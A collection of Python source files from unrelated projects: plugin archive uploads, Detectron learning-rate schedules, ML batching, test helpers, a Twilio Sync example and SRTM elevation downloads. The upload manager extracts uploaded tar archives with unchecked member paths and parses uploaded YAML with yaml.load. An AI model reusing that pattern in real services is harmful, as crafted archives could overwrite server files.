raise manager_exceptions.InvalidPluginError(str(re))
args = get_args_and_verify_arguments([
Argument('title'),
Argument('private_resource', type=boolean),
Argument('visibility')])
visibility = kwargs.get(_VISIBILITY, None)
new_plugin = self._create_plugin_from_archive(data_id,
args.title,
wagon_target_path,
args.private_resource,
visibility)
filter_by_name = {'package_name': new_plugin.package_name}
sm = get_resource_manager().sm
plugins = sm.list(Plugin, filters=filter_by_name)
for plugin in plugins:
if plugin.archive_name == new_plugin.archive_name:
raise manager_exceptions.ConflictError(
'a plugin archive by the name of {archive_name} already '
'exists for package with name {package_name} and version '
'{version}'.format(archive_name=new_plugin.archive_name,
package_name=new_plugin.package_name,
version=new_plugin.package_version))
dest_path = new_plugin.archive_name
sm.put(new_plugin)
return new_plugin, dest_path
def _is_wagon_file(self, file_path):
try:
self._load_plugin_package_json(file_path)
except Exception:
return False
else:
return True
@staticmethod
def _verify_archive(archive_path):
wagons = files_in_folder(archive_path, '*.wgn')
yamls = files_in_folder(archive_path, '*.yaml')
if len(wagons) != 1 or len(yamls) != 1:
raise RuntimeError("Archive must include one wgn file "
"and one yaml file")
return wagons[0], yamls[0]
def _create_plugin_from_archive(self,
plugin_id,
plugin_title,
archive_path,
private_resource,
visibility):
plugin = self._load_plugin_package_json(archive_path)
build_props = plugin.get('build_server_os_properties')
plugin_info = {'package_name': plugin.get('package_name'),
'archive_name': plugin.get('archive_name')}
resource_manager = get_resource_manager()
visibility = resource_manager.get_resource_visibility(
Plugin,
plugin_id,
visibility,
private_resource,
plugin_info
)
return Plugin(
id=plugin_id,
title=plugin_title or plugin.get('package_name'),
package_name=plugin.get('package_name'),
package_version=plugin.get('package_version'),
archive_name=plugin.get('archive_name'),
package_source=plugin.get('package_source'),
supported_platform=plugin.get('supported_platform'),
distribution=build_props.get('distribution'),
distribution_version=build_props.get('distribution_version'),
distribution_release=build_props.get('distribution_release'),
wheels=plugin.get('wheels'),
excluded_wheels=plugin.get('excluded_wheels'),
supported_py_versions=plugin.get('supported_python_versions'),
uploaded_at=get_formatted_timestamp(),
visibility=visibility
)
@staticmethod
def _load_plugin_package_json(wagon_source):
# Disable validation for now - seems to break in certain
# circumstances.
# if wagon.validate(wagon_source):
# # wagon returns a list of validation issues.
# raise manager_exceptions.InvalidPluginError(
# 'the provided wagon can not be read.')
try:
return wagon.show(wagon_source)
except wagon.WagonError as e:
raise manager_exceptions.InvalidPluginError(
'The provided wagon archive can not be read.\n{0}'
.format(str(e)))
class UploadedCaravanManager(UploadedPluginsManager):
class InvalidCaravanException(Exception):
pass
class Caravan(object):
def __init__(self, caravan_path):
self._caravan_path = caravan_path
self._tempdir = tempfile.mkdtemp()
self._cvn_dir = None
self._metadata = None
def __enter__(self):
return self
def __exit__(self, *_):
remove(self._tempdir)
def init_metadata(self):
self._cvn_dir = self._extract(self._caravan_path, self._tempdir)
self._metadata = self._get_metadata(self._cvn_dir)
@property
def root_dir(self):
return self._cvn_dir
@staticmethod
def _get_metadata(path):
try:
with open(os.path.join(path, 'METADATA')) as metadata_file:
metadata = yaml.load(metadata_file)
except Exception:
raise UploadedCaravanManager.InvalidCaravanException(
'Failed to get caravan metadata'
)
return metadata
@property
def metadata(self):
return self._metadata
def __iter__(self):
for wgn_path, yaml_path in self._metadata.items():
yield os.path.join(self._cvn_dir, wgn_path), \
os.path.join(self._cvn_dir, yaml_path)
def __getitem__(self, item):
return os.path.join(self._cvn_dir, self._metadata[item])
@staticmethod
def _extract(src, dest):
try:
tarfile_ = tarfile.open(name=src)
except tarfile.ReadError:
raise UploadedCaravanManager.InvalidCaravanException(
'Failed to load caravan file'
)
try:
# Get the top level dir
root_dir = tarfile_.getmembers()[0]
tarfile_.extractall(path=dest, members=tarfile_.getmembers())
finally:
tarfile_.close()
return os.path.join(dest, root_dir.path)
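    # Illustrative sketch (editorial assumption, not taken from the repository):
    # the METADATA file inside a caravan tarball is a YAML mapping of wagon
    # paths to their plugin-yaml paths relative to the caravan root, e.g.
    #   plugins_a/plugin_a.wgn: plugins_a/plugin.yaml
    #   plugins_b/plugin_b.wgn: plugins_b/plugin.yaml
    # so iterating over a Caravan instance (see __iter__ above) yields absolute
    # (wgn_path, yaml_path) pairs rooted at the extracted temporary directory.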
def _get_kind(self):
return 'caravan'
def receive_uploaded_data(self, data_id=None, **kwargs):
file_server_root = config.instance.file_server_root
resource_target_path = tempfile.mktemp(dir=file_server_root)
try:
self._save_file_locally_and_extract_inputs(
resource_target_path,
self._get_data_url_key(),
self._get_kind())
with self.Caravan(resource_target_path) as caravan_instance:
caravan_instance.init_metadata()
plugins = self._prepare_and_process_doc(
file_server_root,
resource_target_path,
caravan_instance=caravan_instance,
**kwargs)
docs = []
for doc, plugin_dir in plugins:
self._move_archive_to_uploaded_dir(
doc.id,
file_server_root,
plugin_dir,
)
docs.append(doc)
return docs, 201
finally:
remove(resource_target_path)
def _prepare_and_process_doc(self,
file_server_root,
archive_target_path,
**kwargs):
plugins = []
caravan_ = kwargs['caravan_instance']
for wgn_path, _ in caravan_:
files_dir = os.path.dirname(wgn_path)
archive_path = shutil.make_archive(
os.path.join(caravan_.root_dir, os.path.basename(files_dir)),
'zip',
files_dir)
try:
new_plugin, _ = \
super(UploadedCaravanManager,
self)._prepare_and_process_doc(
str(uuid.uuid4()),
file_server_root,
archive_path,
**kwargs
)
plugins.append((new_plugin, files_dir))
except manager_exceptions.ConflictError:
pass
return plugins
|
detectron/utils/lr_policy.py | willkuhn/Detectron | 743 | 12684974 |
# Copyright (c) 2017-present, Facebook, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##############################################################################
"""Learning rate policies."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import numpy as np
from detectron.core.config import cfg
def get_lr_at_iter(it):
"""Get the learning rate at iteration it according to the cfg.SOLVER
settings.
"""
lr = get_lr_func()(it)
if it < cfg.SOLVER.WARM_UP_ITERS:
method = cfg.SOLVER.WARM_UP_METHOD
if method == 'constant':
warmup_factor = cfg.SOLVER.WARM_UP_FACTOR
elif method == 'linear':
alpha = it / cfg.SOLVER.WARM_UP_ITERS
warmup_factor = cfg.SOLVER.WARM_UP_FACTOR * (1 - alpha) + alpha
else:
raise KeyError('Unknown SOLVER.WARM_UP_METHOD: {}'.format(method))
lr *= warmup_factor
return np.float32(lr)
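# Worked example (editorial addition, using illustrative config values): with
# SOLVER.BASE_LR = 0.02, SOLVER.WARM_UP_ITERS = 500, SOLVER.WARM_UP_FACTOR = 1/3
# and the 'linear' warm-up method, iteration it = 250 gives alpha = 0.5, so
# warmup_factor = (1/3) * (1 - 0.5) + 0.5 = 2/3 and the returned lr is
# 0.02 * 2/3 ~= 0.0133; by it = 500 the factor has ramped up to 1.0 and the
# underlying LR policy value is used unchanged.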
# ---------------------------------------------------------------------------- #
# Learning rate policy functions
# ---------------------------------------------------------------------------- #
def lr_func_steps_with_lrs(cur_iter):
"""For cfg.SOLVER.LR_POLICY = 'steps_with_lrs'
Change the learning rate to specified values at specified iterations.
Example:
cfg.SOLVER.MAX_ITER: 90
cfg.SOLVER.STEPS: [0, 60, 80]
cfg.SOLVER.LRS: [0.02, 0.002, 0.0002]
for cur_iter in [0, 59] use 0.02
in [60, 79] use 0.002
in [80, inf] use 0.0002
"""
ind = get_step_index(cur_iter)
return cfg.SOLVER.LRS[ind]
def lr_func_steps_with_decay(cur_iter):
"""For cfg.SOLVER.LR_POLICY = 'steps_with_decay'
Change the learning rate specified iterations based on the formula
lr = base_lr * gamma ** lr_step_count.
Example:
cfg.SOLVER.MAX_ITER: 90
cfg.SOLVER.STEPS: [0, 60, 80]
cfg.SOLVER.BASE_LR: 0.02
cfg.SOLVER.GAMMA: 0.1
for cur_iter in [0, 59] use 0.02 = 0.02 * 0.1 ** 0
in [60, 79] use 0.002 = 0.02 * 0.1 ** 1
in [80, inf] use 0.0002 = 0.02 * 0.1 ** 2
"""
ind = get_step_index(cur_iter)
return cfg.SOLVER.BASE_LR * cfg.SOLVER.GAMMA ** ind
def lr_func_step(cur_iter):
"""For cfg.SOLVER.LR_POLICY = 'step'
"""
return (
cfg.SOLVER.BASE_LR *
cfg.SOLVER.GAMMA ** (cur_iter // cfg.SOLVER.STEP_SIZE))
# ---------------------------------------------------------------------------- #
# Helpers
# ---------------------------------------------------------------------------- #
def get_step_index(cur_iter):
"""Given an iteration, find which learning rate step we're at."""
assert cfg.SOLVER.STEPS[0] == 0, 'The first step should always start at 0.'
steps = cfg.SOLVER.STEPS + [cfg.SOLVER.MAX_ITER]
for ind, step in enumerate(steps): # NoQA
if cur_iter < step:
break
return ind - 1
def get_lr_func():
policy = 'lr_func_' + cfg.SOLVER.LR_POLICY
if policy not in globals():
raise NotImplementedError(
'Unknown LR policy: {}'.format(cfg.SOLVER.LR_POLICY))
else:
return globals()[policy]
|
jhkaggle/jhkaggle/__init__.py | DATA602/jh-kaggle-util | 273 | 12684980 | import json
import os
from pathlib import Path
jhkaggle_config = {}
def load_config(profile,filename = None):
global jhkaggle_config
if not filename:
home = str(Path.home())
filename = os.path.join(home,".jhkaggleConfig.json")
if not os.path.isfile(filename):
raise Exception(f"If no 'filename' paramater specifed, assume '.jhkaggleConfig.json' exists at HOME: {home}")
with open(filename) as f:
data = json.load(f)
if profile not in data:
raise Exception(f"Undefined profile '{profile}' in file '{filename}'")
jhkaggle_config = data[profile] |
npt/utils/batch_utils.py | jacobkimmel/non-parametric-transformers | 302 | 12684991 |
import warnings
from collections import OrderedDict, defaultdict
import numpy as np
from sklearn.utils.multiclass import type_of_target
from sklearn.utils.validation import column_or_1d
import torch
TORCH_MAJOR = int(torch.__version__.split('.')[0])
TORCH_MINOR = int(torch.__version__.split('.')[1])
if TORCH_MAJOR == 1 and TORCH_MINOR < 8:
from torch._six import container_abcs
else:
import collections.abc as container_abcs
collate_with_pre_batching_err_msg_format = (
"collate_with_pre_batched_map: "
"batch must be a list with one map element; found {}")
def collate_with_pre_batching(batch):
r"""
Collate function used by our PyTorch dataloader (in both distributed and
serial settings).
We avoid adding a batch dimension, as for NPT we have pre-batched data,
where each element of the dataset is a map.
:arg batch: List[Dict] (not as general as the default collate fn)
"""
if len(batch) > 1:
raise NotImplementedError
elem = batch[0]
elem_type = type(elem)
if isinstance(elem, container_abcs.Mapping):
return elem # Just return the dict, as there will only be one in NPT
raise TypeError(collate_with_pre_batching_err_msg_format.format(elem_type))
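# Hedged usage sketch (editorial addition; the dataset/loader names are
# assumptions): because every dataset element is already a fully batched map,
# the function above is meant to be plugged into a DataLoader with batch_size=1
# so that no extra batch dimension is introduced, e.g.
#   loader = torch.utils.data.DataLoader(
#       pre_batched_dataset, batch_size=1,
#       collate_fn=collate_with_pre_batching)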
# TODO: batching over features?
class StratifiedIndexSampler:
def __init__(
self, y, n_splits, shuffle=True, label_col=None,
train_indices=None):
self.y = y
self.n_splits = n_splits
self.shuffle = shuffle
self.label_col = label_col
self.train_indices = train_indices
if label_col is not None and train_indices is not None:
self.stratify_class_labels = True
print('Stratifying train rows in each batch on the class label.')
else:
self.stratify_class_labels = False
def _make_test_folds(self, labels):
"""
Slight alterations from sklearn (StratifiedKFold)
"""
y, n_splits, shuffle = labels, self.n_splits, self.shuffle
y = np.asarray(y)
type_of_target_y = type_of_target(y)
allowed_target_types = ('binary', 'multiclass')
if type_of_target_y not in allowed_target_types:
raise ValueError(
'Supported target types are: {}. Got {!r} instead.'.format(
allowed_target_types, type_of_target_y))
y = column_or_1d(y)
_, y_idx, y_inv = np.unique(y, return_index=True, return_inverse=True)
# y_inv encodes y according to lexicographic order. We invert y_idx to
# map the classes so that they are encoded by order of appearance:
# 0 represents the first label appearing in y, 1 the second, etc.
_, class_perm = np.unique(y_idx, return_inverse=True)
y_encoded = class_perm[y_inv]
n_classes = len(y_idx)
y_counts = np.bincount(y_encoded)
min_groups = np.min(y_counts)
if np.all(n_splits > y_counts):
raise ValueError("n_splits=%d cannot be greater than the"
" number of members in each class."
% (n_splits))
if n_splits > min_groups:
warnings.warn(("The least populated class in y has only %d"
" members, which is less than n_splits=%d."
% (min_groups, n_splits)), UserWarning)
# Determine the optimal number of samples from each class in each fold,
# using round robin over the sorted y. (This can be done direct from
# counts, but that code is unreadable.)
y_order = np.sort(y_encoded)
allocation = np.asarray(
[np.bincount(y_order[i::n_splits], minlength=n_classes)
for i in range(n_splits)])
# To maintain the data order dependencies as best as possible within
# the stratification constraint, we assign samples from each class in
# blocks (and then mess that up when shuffle=True).
test_folds = np.empty(len(y), dtype='i')
for k in range(n_classes):
# since the kth column of allocation stores the number of samples
# of class k in each test set, this generates blocks of fold
# indices corresponding to the allocation for class k.
folds_for_class = np.arange(n_splits).repeat(allocation[:, k])
if shuffle:
np.random.shuffle(folds_for_class)
test_folds[y_encoded == k] = folds_for_class
return test_folds
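    # Worked example (editorial addition): with y_encoded = [0,0,0,0,0,1,1,1]
    # (five samples of class 0, three of class 1) and n_splits = 2, the sorted
    # labels are split round-robin, so allocation = [[3,1],[2,2]] - fold 0 gets
    # three class-0 and one class-1 sample, fold 1 gets two of each - before the
    # per-class blocks are optionally shuffled and written into test_folds.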
def get_stratified_test_array(self, X):
"""
Based on sklearn function StratifiedKFold._iter_test_masks.
"""
if self.stratify_class_labels:
return self.get_train_label_stratified_test_array(X)
test_folds = self._make_test_folds(self.y)
# Inefficient for huge arrays, particularly when we need to materialize
# the index order.
# for i in range(n_splits):
# yield test_folds == i
batch_index_to_row_indices = OrderedDict()
batch_index_to_row_index_count = defaultdict(int)
for row_index, batch_index in enumerate(test_folds):
if batch_index not in batch_index_to_row_indices.keys():
batch_index_to_row_indices[batch_index] = [row_index]
else:
batch_index_to_row_indices[batch_index].append(row_index)
batch_index_to_row_index_count[batch_index] += 1
# Keep track of the batch sizes for each batch -- this can vary
# towards the end of the epoch, and will not be precisely what the
# user specified. Doesn't matter because the model is equivariant
# w.r.t. rows.
batch_sizes = []
for batch_index in batch_index_to_row_indices.keys():
batch_sizes.append(batch_index_to_row_index_count[batch_index])
return (
X[np.concatenate(list(batch_index_to_row_indices.values()))],
batch_sizes)
def get_train_label_stratified_test_array(self, X):
train_class_folds = self._make_test_folds(
self.label_col[self.train_indices])
# Mapping from the size of a stratified batch of training rows
# to the index of the batch.
train_batch_size_to_train_batch_indices = defaultdict(list)
# Mapping from a train batch index to all of the actual train indices
train_batch_index_to_train_row_indices = OrderedDict()
for train_row_index, train_batch_index in enumerate(train_class_folds):
if (train_batch_index not in
train_batch_index_to_train_row_indices.keys()):
train_batch_index_to_train_row_indices[
train_batch_index] = [train_row_index]
else:
train_batch_index_to_train_row_indices[
train_batch_index].append(train_row_index)
for train_batch_index, train_row_indices in (
train_batch_index_to_train_row_indices.items()):
train_batch_size_to_train_batch_indices[
len(train_row_indices)].append(train_batch_index)
test_folds = self._make_test_folds(self.y)
# Mapping our actual batch indices to the val and test rows which
# have been successfully assigned
batch_index_to_val_test_row_indices = OrderedDict()
# Mapping our actual batch indices to the total number of row indices
# in each batch. We will have to assign the stratified train batches
# to fulfill this constraint.
batch_index_to_row_index_count = defaultdict(int)
# Mapping our actual batch indices to how many train spots are
# "vacant" in each batch. These we will fill with our stratified
# train batches.
batch_index_to_train_row_index_count = defaultdict(int)
for row_index, (batch_index, dataset_mode) in enumerate(
zip(test_folds, self.y)):
batch_index_to_row_index_count[batch_index] += 1
if dataset_mode == 0: # Train
batch_index_to_train_row_index_count[batch_index] += 1
else:
if batch_index not in (
batch_index_to_val_test_row_indices.keys()):
batch_index_to_val_test_row_indices[
batch_index] = [row_index]
else:
batch_index_to_val_test_row_indices[
batch_index].append(row_index)
# For all of our actual batches, let's find a suitable batch
# of stratified training data for us to use.
for batch_index, train_row_index_count in batch_index_to_train_row_index_count.items():
try:
train_batch_index = (
train_batch_size_to_train_batch_indices[
train_row_index_count].pop())
except Exception as e:
raise e
batch_index_to_val_test_row_indices[batch_index] += (
train_batch_index_to_train_row_indices[train_batch_index])
for train_batch_arr in train_batch_size_to_train_batch_indices.values():
if len(train_batch_arr) != 0:
raise Exception
batch_sizes = []
for batch_index in batch_index_to_val_test_row_indices.keys():
batch_sizes.append(batch_index_to_row_index_count[batch_index])
batch_order_sorted_row_indices = X[
np.concatenate(list(batch_index_to_val_test_row_indices.values()))]
assert (
len(set(batch_order_sorted_row_indices)) ==
len(batch_order_sorted_row_indices))
return batch_order_sorted_row_indices, batch_sizes
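# Usage sketch for get_stratified_test_array (the enclosing class and its
# constructor are not shown in this excerpt, so `batcher` below is a
# hypothetical instance name):
#   rows, batch_sizes = batcher.get_stratified_test_array(X)
#   start = 0
#   for size in batch_sizes:
#       batch = rows[start:start + size]
#       start += size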
|
napari/components/experimental/chunk/__init__.py | MaksHess/napari | 1,345 | 12685004 | """chunk module"""
from ._loader import chunk_loader, synchronous_loading, wait_for_async
from ._request import ChunkLocation, ChunkRequest, LayerRef, OctreeLocation
__all__ = [
'ChunkLocation',
'OctreeLocation',
'ChunkRequest',
'LayerRef',
'chunk_loader',
'wait_for_async',
'synchronous_loading',
]
|
opendatatools/index/__init__.py | solider245/OpenData | 1,179 | 12685022 | from .index_interface import * |
cactus/tests/integration/__init__.py | danielchasehooper/Cactus | 1,048 | 12685038 | #coding:utf-8
from __future__ import unicode_literals
import os
import shutil
from six.moves import http_client, urllib
from cactus.site import Site
from cactus.plugin.manager import PluginManager
from cactus.utils.helpers import CaseInsensitiveDict
from cactus.utils.parallel import PARALLEL_DISABLED
from cactus.tests import BaseBootstrappedTestCase
class DummyPluginManager(PluginManager):
"""
Doesn't do anything
"""
def call(self, method, *args, **kwargs):
"""
Trap the call
"""
pass
class IntegrationTestCase(BaseBootstrappedTestCase):
def setUp(self):
super(IntegrationTestCase, self).setUp()
self.site = Site(self.path,
PluginManagerClass=DummyPluginManager, DeploymentEngineClass=self.get_deployment_engine_class())
self.site._parallel = PARALLEL_DISABLED
self.site.config.set('site-url', 'http://example.com/')
# Clean up the site paths
for path in (self.site.page_path, self.site.static_path):
shutil.rmtree(path)
os.mkdir(path)
def get_deployment_engine_class(self):
"""
Should return a deployment engine in tests.
"""
pass
class BaseTestHTTPConnection(object):
last_request = None
def __init__(self, host, *args, **kwargs):
self.host = host
self.requests = []
def connect(self):
pass
def close(self):
pass
def request(self, method, url, body=b'', headers=None):
"""
Send a full request at once
"""
if headers is None:
headers = {}
self.last_request = TestHTTPRequest(self, method, url, body, headers)
def putrequest(self, method, url, *args, **kwargs):
"""
Create a new request, but add more things to it later
"""
self.current_request = TestHTTPRequest(self, method, url, b'', {})
self.current_request.state = "headers"
def putheader(self, header, value):
"""
Add an header to a request that's in progress
"""
self.current_request.headers[header] = value
def endheaders(self, data=None):
"""
End the headers of a request that's in progress
"""
self.current_request.state = "body"
self.last_request = self.current_request
if data is not None:
self.send(data)
def send(self, data):
"""
Add data to a request that's in progress
"""
self.current_request.body += data
def getresponse(self):
request = self.last_request
self.requests.append(request)
return self.handle_request(request)
def handle_request(self, request):
"""
:param request: The request to handle
"""
raise NotImplementedError("handle_request should be implemented by subclasses")
def set_debuglevel(self, level):
pass
class DebugHTTPSConnectionFactory(object):
def __init__(self, conn_cls):
self.conn_cls = conn_cls
self.connections = []
@property
def requests(self):
"""
        :returns: A list of the requests made through this connection factory, across all of its connections
"""
out = []
for connection in self.connections:
out.extend(connection.requests)
return out
def __call__(self, *args, **kwargs):
"""
Create a new connection from our connection class
"""
connection = self.conn_cls(*args, **kwargs)
self.connections.append(connection)
return connection
class TestHTTPRequest(object):
state = None
def __init__(self, connection, method, url, body, headers):
self.connection = connection
self.method = method
self.url = url
self.body = body
self.headers = CaseInsensitiveDict(headers)
u = urllib.parse.urlparse(url)
self.path = u.path
self.params = urllib.parse.parse_qs(u.query, keep_blank_values=True)
class TestHTTPResponse(object):
def __init__(self, status, reason=None, headers=None, body=''):
if reason is None:
reason = http_client.responses[status]
if headers is None:
headers = {}
self.status = status
self.reason = reason
self.headers = CaseInsensitiveDict(headers)
self.body = body
def getheader(self, header, default=None):
return self.headers.get(header, default)
def getheaders(self):
return self.headers
def read(self):
return self.body
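# Typical wiring in a test (a sketch; how the deployment engine picks up the
# connection factory depends on the backend under test):
#   class RecordingHTTPConnection(BaseTestHTTPConnection):
#       def handle_request(self, request):
#           return TestHTTPResponse(200, body='{}')
#   factory = DebugHTTPSConnectionFactory(RecordingHTTPConnection)
#   # ... patch the deployment engine's HTTPS connection class with `factory`,
#   # run the deploy, then inspect `factory.requests` for assertions.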
|
tests/mini_toolbox/__init__.py | luenk/PySnooper | 15,937 | 12685040 | # Copyright 2019 <NAME> and collaborators.
# This program is distributed under the MIT license.
import tempfile
import shutil
import io
import sys
from . import pathlib
from . import contextlib
@contextlib.contextmanager
def BlankContextManager():
yield
@contextlib.contextmanager
def create_temp_folder(prefix=tempfile.template, suffix='',
parent_folder=None, chmod=None):
'''
Context manager that creates a temporary folder and deletes it after usage.
After the suite finishes, the temporary folder and all its files and
subfolders will be deleted.
Example:
with create_temp_folder() as temp_folder:
# We have a temporary folder!
assert temp_folder.is_dir()
# We can create files in it:
(temp_folder / 'my_file').open('w')
# The suite is finished, now it's all cleaned:
assert not temp_folder.exists()
Use the `prefix` and `suffix` string arguments to dictate a prefix and/or a
suffix to the temporary folder's name in the filesystem.
If you'd like to set the permissions of the temporary folder, pass them to
the optional `chmod` argument, like this:
create_temp_folder(chmod=0o550)
'''
temp_folder = pathlib.Path(tempfile.mkdtemp(prefix=prefix, suffix=suffix,
dir=parent_folder))
try:
if chmod is not None:
temp_folder.chmod(chmod)
yield temp_folder
finally:
shutil.rmtree(str(temp_folder))
class NotInDict:
'''Object signifying that the key was not found in the dict.'''
class TempValueSetter(object):
'''
Context manager for temporarily setting a value to a variable.
The value is set to the variable before the suite starts, and gets reset
back to the old value after the suite finishes.
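    Example (a sketch; `some_stream` stands in for any writable file object):
        import sys
        with TempValueSetter((sys, 'stdout'), some_stream):
            print('redirected')  # written to `some_stream`
        # sys.stdout is restored to its previous value here.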
'''
def __init__(self, variable, value, assert_no_fiddling=True):
'''
Construct the `TempValueSetter`.
        `variable` may be either an `(object, attribute_string)` pair, a
        `(dict, key)` pair, or a `(getter, setter)` pair.
`value` is the temporary value to set to the variable.
'''
self.assert_no_fiddling = assert_no_fiddling
#######################################################################
# We let the user input either an `(object, attribute_string)`, a
# `(dict, key)` pair, or a `(getter, setter)` pair. So now it's our job
# to inspect `variable` and figure out which one of these options the
# user chose, and then obtain from that a `(getter, setter)` pair that
# we could use.
bad_input_exception = Exception(
'`variable` must be either an `(object, attribute_string)` pair, '
'a `(dict, key)` pair, or a `(getter, setter)` pair.'
)
try:
first, second = variable
except Exception:
raise bad_input_exception
if hasattr(first, '__getitem__') and hasattr(first, 'get') and \
hasattr(first, '__setitem__') and hasattr(first, '__delitem__'):
# `first` is a dictoid; so we were probably handed a `(dict, key)`
# pair.
self.getter = lambda: first.get(second, NotInDict)
self.setter = lambda value: (first.__setitem__(second, value) if
value is not NotInDict else
first.__delitem__(second))
### Finished handling the `(dict, key)` case. ###
elif callable(second):
# `second` is a callable; so we were probably handed a `(getter,
# setter)` pair.
if not callable(first):
raise bad_input_exception
self.getter, self.setter = first, second
### Finished handling the `(getter, setter)` case. ###
else:
# All that's left is the `(object, attribute_string)` case.
if not isinstance(second, str):
raise bad_input_exception
parent, attribute_name = first, second
self.getter = lambda: getattr(parent, attribute_name)
self.setter = lambda value: setattr(parent, attribute_name, value)
### Finished handling the `(object, attribute_string)` case. ###
#
#
### Finished obtaining a `(getter, setter)` pair from `variable`. #####
self.getter = self.getter
'''Getter for getting the current value of the variable.'''
self.setter = self.setter
        '''Setter for setting the variable's value.'''
self.value = value
'''The value to temporarily set to the variable.'''
self.active = False
def __enter__(self):
self.active = True
self.old_value = self.getter()
'''The old value of the variable, before entering the suite.'''
self.setter(self.value)
# In `__exit__` we'll want to check if anyone changed the value of the
# variable in the suite, which is unallowed. But we can't compare to
# `.value`, because sometimes when you set a value to a variable, some
# mechanism modifies that value for various reasons, resulting in a
# supposedly equivalent, but not identical, value. For example this
# happens when you set the current working directory on Mac OS.
#
# So here we record the value right after setting, and after any
# possible processing the system did to it:
self._value_right_after_setting = self.getter()
return self
def __exit__(self, exc_type, exc_value, exc_traceback):
if self.assert_no_fiddling:
# Asserting no-one inside the suite changed our variable:
assert self.getter() == self._value_right_after_setting
self.setter(self.old_value)
self.active = False
class OutputCapturer(object):
'''
Context manager for catching all system output generated during suite.
Example:
with OutputCapturer() as output_capturer:
print('woo!')
assert output_capturer.output == 'woo!\n'
The boolean arguments `stdout` and `stderr` determine, respectively,
whether the standard-output and the standard-error streams will be
captured.
'''
def __init__(self, stdout=True, stderr=True):
self.string_io = io.StringIO()
if stdout:
self._stdout_temp_setter = \
TempValueSetter((sys, 'stdout'), self.string_io)
else: # not stdout
self._stdout_temp_setter = BlankContextManager()
if stderr:
self._stderr_temp_setter = \
TempValueSetter((sys, 'stderr'), self.string_io)
else: # not stderr
self._stderr_temp_setter = BlankContextManager()
def __enter__(self):
'''Manage the `OutputCapturer`'s context.'''
self._stdout_temp_setter.__enter__()
self._stderr_temp_setter.__enter__()
return self
def __exit__(self, exc_type, exc_value, exc_traceback):
# Not doing exception swallowing anywhere here.
self._stderr_temp_setter.__exit__(exc_type, exc_value, exc_traceback)
self._stdout_temp_setter.__exit__(exc_type, exc_value, exc_traceback)
output = property(lambda self: self.string_io.getvalue(),
doc='''The string of output that was captured.''')
class TempSysPathAdder(object):
'''
Context manager for temporarily adding paths to `sys.path`.
Removes the path(s) after suite.
Example:
with TempSysPathAdder('path/to/fubar/package'):
import fubar
fubar.do_stuff()
'''
def __init__(self, addition):
self.addition = [str(addition)]
def __enter__(self):
self.entries_not_in_sys_path = [entry for entry in self.addition if
entry not in sys.path]
sys.path += self.entries_not_in_sys_path
return self
def __exit__(self, *args, **kwargs):
for entry in self.entries_not_in_sys_path:
# We don't allow anyone to remove it except for us:
assert entry in sys.path
sys.path.remove(entry)
|
sync/rest/documents/update-document/update-document.6.x.py | Tshisuaka/api-snippets | 234 | 12685041 | # Download the Python helper library from twilio.com/docs/python/install
import os
from twilio.rest import Client
from datetime import datetime
# Your Account Sid and Auth Token from twilio.com/user/account
# To set up environmental variables, see http://twil.io/secure
account_sid = os.environ['TWILIO_ACCOUNT_SID']
auth_token = os.environ['TWILIO_AUTH_TOKEN']
client = Client(account_sid, auth_token)
new_data = {
'date_updated': str(datetime.now()),
'movie_title': "On The Line",
'show_times': None,
'starring': ["Lance Bass", "<NAME>"],
'genre': "Romance"
}
document = client.sync \
.services("ISXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.documents("MyFirstDocument") \
.update(data=new_data)
print(document.data)
|
wradlib/io/dem.py | wradlib/wradlib | 180 | 12685043 | #!/usr/bin/env python
# Copyright (c) 2011-2020, wradlib developers.
# Distributed under the MIT License. See LICENSE.txt for more info.
"""
Digital Elevation Model Data I/O
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Provide surface/terrain elevation information from SRTM data
.. autosummary::
:nosignatures:
:toctree: generated/
{}
"""
__all__ = ["download_srtm", "get_srtm"]
__doc__ = __doc__.format("\n ".join(__all__))
import os
import numpy as np
import requests
from osgeo import gdal
from wradlib import util
class HeaderRedirection(requests.Session):
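    # requests.Session subclass that keeps HTTP basic-auth credentials across
    # redirects, except that it drops the Authorization header on cross-host
    # redirects when neither host is the Earthdata login host.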
AUTH_HOST = "urs.earthdata.nasa.gov"
def __init__(self, username, password):
super().__init__()
self.auth = (username, password)
def rebuild_auth(self, request, response):
headers = request.headers
url = request.url
if "Authorization" in headers:
original = requests.utils.urlparse(response.request.url).hostname
redirect = requests.utils.urlparse(url).hostname
if (
original != redirect
and redirect != self.AUTH_HOST
and original != self.AUTH_HOST
):
del headers["Authorization"]
return
def download_srtm(filename, destination, resolution=3):
"""
Download NASA SRTM elevation data
Only available with login/password
Parameters
----------
filename : str
srtm file to download
destination : str
output filename
resolution : int
resolution of SRTM data (1, 3 or 30)
"""
website = "https://e4ftl01.cr.usgs.gov/MEASURES"
subres = 3
if resolution == 30:
subres = 2
resolution = f"SRTMGL{resolution}.00{subres}"
source = "/".join([website, resolution, "2000.02.11"])
url = "/".join([source, filename])
user = os.environ.get("WRADLIB_EARTHDATA_USER", None)
pwd = os.environ.get("WRADLIB_EARTHDATA_PASS", None)
if user is None or pwd is None:
raise ValueError(
"WRADLIB_EARTHDATA_USER and/or WRADLIB_EARTHDATA_PASS environment "
"variable missing. Downloading SRTM data requires a NASA Earthdata "
"Login username and password. To obtain a NASA Earthdata Login account, "
"please visit https://urs.earthdata.nasa.gov/users/new/."
)
session = HeaderRedirection(user, pwd)
try:
r = session.get(url, stream=True)
r.raise_for_status()
if destination is None:
destination = filename
with open(destination, "wb") as fd:
            for chunk in r.iter_content(chunk_size=1024 * 1024):
fd.write(chunk)
except requests.exceptions.HTTPError as err:
status_code = err.response.status_code
if status_code != 404:
raise err
def get_srtm(extent, resolution=3, merge=True):
"""
Get NASA SRTM elevation data
Parameters
----------
extent : list
list containing lonmin, lonmax, latmin, latmax
resolution : int
resolution of SRTM data (1, 3 or 30)
merge : bool
True to merge the tiles in one dataset
Returns
-------
dataset : :py:class:`gdal:osgeo.gdal.Dataset`
gdal.Dataset Raster dataset containing elevation information
"""
extent = [int(np.floor(x)) for x in extent]
lonmin, lonmax, latmin, latmax = extent
filelist = []
